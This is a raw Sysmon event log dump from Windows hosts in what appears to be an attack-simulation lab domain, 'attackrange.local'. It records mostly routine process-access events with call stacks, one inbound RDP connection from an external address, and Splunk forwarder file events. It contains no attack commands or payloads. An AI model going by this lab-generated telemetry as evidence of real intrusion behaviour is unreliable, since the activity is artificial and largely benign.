08:05:40.262{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.246{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.246{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.208{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.192{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.192{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 354300x80000000000000001053854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:31.551{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-53520-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000810021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:41.902{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54232917C81809038076871AC4EECFBD,SHA256=6F33D1E3370E914A1C26A9B0C7EC255171A42B055EEAA205064FBED16A154AB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.494{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30EE21E10B528C07C4192DF3FCDD9BEA,SHA256=6D868FF03F1B2B34E56EEDCB949824826C5143DCCD1A6A93CBA6CE40C8822C60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.410{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E3E5F901A6BA5E650BE303975857DCE,SHA256=1A6AD4C28A898ACE9A199452E53817849623A5F9D9B0841386A0D1236A049CC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.410{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E5911AAFFBFF11A73F39A1120181F14,SHA256=EA3FC8E5D688B1B12FDBCA8A1A3BE3F00752A38DCB4D2F988E1135CA0F7C6144,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.145{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.145{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.144{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.143{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 